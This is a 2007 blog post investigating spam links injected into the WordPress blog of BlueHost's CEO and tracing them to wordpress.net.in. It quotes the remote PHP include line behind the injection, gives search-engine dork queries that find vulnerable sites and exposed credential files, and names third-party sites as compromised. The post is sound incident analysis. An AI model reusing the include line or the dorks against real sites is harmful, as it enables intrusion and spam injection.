• December 1st, 2007

      Matt Heaton BlueHost HostMonster CEO Official Blog Hacked Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

      Dec 11 2007 - Matt Heaton Blog’s has been cleansed. ATM he’s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade.

      Jan 26th, 2008 - Seem like bluehost engineer did a bad job at cleaning, the goro spam is back.

      bluehost hosmonsterJust after the recent issue on wordpress.com.cn now there is new wordpress imitater. A remote spamware injection by wordpress.net.in

      I was reading one of Matt Heaton posted 2 days ago when I found bunch of spamsware link on his wordpress footer.

      mattheaton.com bluehost ceo hack wordpress footer

      Matt’s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to howardowens.com/?order=XX page.

      Lookup for howardowens.com

      The below diagram explained the lookup results for howardowens.com. click on the image to enlarge.

      lookup results for howardowens-com
      Surprisingly the spammer website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).

      Tracking the spam sources.

      mattheaton.com hackedViewing mattheaton.com html sources I found some hint and start searching for xanax intext:id=\”goro\”. Google return 2 results for this query.

      1. Wordpress Support
      php get footer adding spam code?
      2. elijahzarwan.net
      div id=”Goro” (nice headline)

      Both site suggest same type of php injection methods
      include('http://wordpress.net.in/statcounter.php');

      The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from http://wordpress.net.in/[random]/ random = 1 - 9.

      Raw whois for wordpress.net.in

      Domain ID:D2500581-AFIN
      Domain Name:WORDPRESS.NET.IN
      Created On:22-Apr-2007 12:01:55 UTC
      Last Updated On:22-Jun-2007 02:26:40 UTC
      Expiration Date:22-Apr-2008 12:01:55 UTC
      Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
      Status:OK
      Registrant ID:DI_4275224
      Registrant Name:Mick Jagger
      Registrant Organization:N/A
      Registrant Street1:1 Red Square
      Registrant City:Moscow
      Registrant State/Province:Massachusetts
      Registrant Postal Code:123592
      Registrant Country:RU
      Registrant Phone:+007.7581235641
      Registrant Email:mkk.goro@bk.ru
      Admin ID:DI_4275224
      Admin Name:Mick Jagger
      Admin Organization:N/A
      Admin Street1:1 Red Square
      Admin City:Moscow
      Admin State/Province:Massachusetts
      Admin Postal Code:123592
      Admin Country:RU
      Admin Phone:+007.7581235641
      Admin Email:mkk.goro@bk.ru
      Tech ID:DI_4275224
      Tech Name:Mick Jagger
      Tech Organization:N/A
      Tech Street1:1 Red Square
      Tech City:Moscow
      Tech State/Province:Massachusetts
      Tech Postal Code:123592
      Tech Country:RU
      Tech Phone:+007.7581235641
      Tech Email:mkk.goro@bk.ru
      Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
      Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
      Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
      Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM
      

      Note: The registrant address on 1 red square is a famous restaurant in Moscow.

      Its pretty obvious that wordpress.net.in belong to registrar in India.

      Live example wordpress.net.in injection

      Google query for warning “[function.include]” allintext: “wordpress.net.in” . Used fiddler or any http-inspector to trace the full header request.

      1 Evan Morris
      Wordpress 2.0.6 | url | screenshot
      2 carwax
      Wordpress 1.5.2 | url | screenshot
      3 aabenthus.biz
      Wordpress 2.0.x | url | screenshot
      4 mythinger.com
      Wordpress 2.0.2 | url | screenshot
      5 classicalanglican.net
      Wordpress 2.0.2 | url | screenshot
      6 echo9er.net
      WordPress 1.5.1 | url | screenshot
      7 boyarick.com
      Wordpress 2.0.2 | url | screenshot

      Google Directory search for class-mail.php

      Search for class-mail.php in open directory (public).
      “parent directory” class-mail.php -html -htm –php -shtml -md5 -md5sums

      • jean-cyril.com - wp-includes · spams link redirect to www.901am.com/?page=2157. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.
      • floaridablog.org - wp-includes · spams redirect to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.

      Hiding from search engine Spiders

      First, I did some more comparative search at archive.org for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.

      • http://web.archive.org/web/*/http://www.howardowens.com
      • http://web.archive.org/web/*/http://www.mattheaton.com

      Out of boredom I cloaked myself as the following agents.

      • Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
      • Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
      • Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
      • Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com

      Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler & spider from spying their joy-ride-spamhouse.

      Summary

      bits & bytes from this accident we knew that

      • Most of the site inject are running on wordpress 2.0.6 & below
      • allow_furl_open is set to true for this injection to work
      • Most of the blogs owner is unaware about the spams links (cloacking)

      Checkout Murray access log, it will give you some ideas with the remote injections methods.

      Update

      Dec 03 2007
      All the spams link to howardowens.com page has been removed. I havent talk with howardowens but I assume howard’s site is being injected the same way like Matt Heaton blog.
      Dec 04 2007
      Mattheaton.com has a minor update, the spams now inject on both header and footer.
      tangonoticias.com:7070/d_pill/577.html.
      As tangonoticias.com is running on Joomla CMS they create a static “Wordpress” on port 7070 (Real Network Server & RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. Google Cache (Nov 12)
      Dec 11 2007
      Matt heaton has been purified. He’s now using latest version of Wordpress (2.3.1). You can still view it on cached thought & screenshot.

      Related Post

      Bookmarks

No Responses to “Matt Heaton BlueHost HostMonster CEO Official Blog Hacked”

    • Anonymous's photo Kakkoi
    • RE: Matt Heaton BlueHost HostMonster CEO Official Blog Hacked - 'Commenting Guidlines' ↓
      5 months, 1 week ago on Saturday, December 1st, 2007 at 9:55 am 5 url
      0%

      The following "Code" are designed to protect you and other users of the site.

      • Be relevant: Your comment should be a thoughtful contribution to the subject of the entry. Keep your comments constructive and polite.
      • No advertising or spamming: Do not use the comment feature to promote commercial entities/products, affiliates services or websites. You are allowed to post a link as long as it's relevant to the entry.
      • Keep within the law: Do not link to offensive or illegal content websites. Do not make any defamatory or disparaging comments which might damage the reputation of a person or organisation.
      • Privacy: Do not post any personal information relating to yourself or anyone else - (ie: address, place of employment, telephone or mobile number or email address).

      In order to keep these experiences enjoyable and interesting for all of our users, we ask that you follow the above guidlines. Feel free to engage, ask questions, and tell us what you are thinking! Regular and insightful comments are most welcomed.

      be the first to comment.

Have your say

  • Hint: Write as if you were talking to a good friend (in front of your mother).

Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved.